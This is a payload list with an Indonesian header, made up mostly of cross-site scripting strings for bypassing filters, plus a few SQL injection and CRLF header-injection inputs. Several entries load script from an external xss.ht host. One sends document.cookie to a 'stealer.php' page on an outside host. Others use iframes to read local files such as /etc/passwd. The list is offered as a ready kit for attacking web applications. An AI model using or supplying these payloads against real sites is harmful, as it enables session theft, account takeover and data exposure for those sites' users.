
### PAYLOAD XSS ### 
PAYLOAD INI DIDAPATKAN DARI BERBAGAI SUMBER YANG DITEMUKAN OLEH PENULIS
TOLONG DOAKAN PENULIS DAN PEMILIK PAYLOAD YANG PENULIS DAPATKAN DARI SUMBER MANAPUN, 
SEMOGA BERKAH DAN MEMBAWA MANFAAT SELALU
-----------------------------------------------------------------------

 "><svg/onload=alert(document.domain)>

<script>document.write('<iframe src=file:///etc/passwd></iframe>');</scrip>

<img src="testing" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fzhirosec.xss.ht%3E%3C%2Fscript%3E

<script>alert(111);</script>zhirow

“><img src=x onerror=write(document.domain)>

---"><script src=//zhirosec.xss.ht></script>---

test"><body %00 onControl hello onmouseleave=confirm(cookie) x>XSS

test"><html><select %00 onControl onpointerenter=prompt(cookie) hello>

test"><input %00 onControl hello oninput=confirm(cookie) x>

"><script src=https://zhirosec.xss.ht></script>

</script><script>alert(document.domain)</script>

<Img Src=\" OnError=alert(1)//\">

<xhzeem/x=" onmouseover=eva&#x6c;?.(id+/(document.domain)/.source) id=confirm>

)%20AN<>D%201=(SE<>LECT%201%20FR<>OM%20PG_SLE<>EP(5))%20AN<>D%20(1=1

<svg on onload=(alert)(document.cookie)>

{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}} ===> golang xss
 
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>

<Svg%2Fonload%3Dalert(document.domain)>

<svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>

<!--><svg onload='top[/al/.source+/ert/.source](document.cookie)'>

javascri%0Dpt:alert/**/(1)<svg onload=alert(document.domain)>

abc"><svg+onload=confirm(document.domain)>

abc"><svg+onload=confirm(document.domain)>

<script>alert(1)</script>

<script>alert("xss bug input search by zhirobyte")</script>

"><img src=x onerror=prompt(document.cookie)>

1%27/**/%256fR/**/50%2521%253D22%253B%2523

<svg onload=prompt%26%230000000040document.domain)>

<svg onload=prompt%26%23x000000028;document.domain)>

<script type="text/javascript">
document.location='https://zhirobyte.000webhostapp.com/stealer.php?c='+document.cookie;</script>

<script type="text/javascript">

<img src=x onerror=$.getScript(String.fromCharCode(47,47,120,111,114,46,99,99))></script>

javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

“><a href=”#” onmouseleave=alert(test)>Click

<svg%20onload=alert(document.cookie)><"x

1%27/**/%256fR/**/50%2521%253D22%253B%2523 

%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html><script>alert(document.cookie)</script><!-- 

%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%2A%27%2F

">'><script>alert(document.domain)</script>

%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%2A%27%2F

%3Ciframe%20src=%22javascript:alert(document.domain)%22%3E%3C/iframe%3E

test+(<script>alert(0)</script>)@domain.com

test@domain(<script>alert(0)</script>).com

"<script>alert(0)</script>"@domain.com

<input type="text" value='' <div/autofocus/onfo<!--esi-->cus='a<!--esi-->lert("test")'>x</div>

“> <img src = x onerror = javascript: alert (1); 
-----------------------------------------------------------------------
 
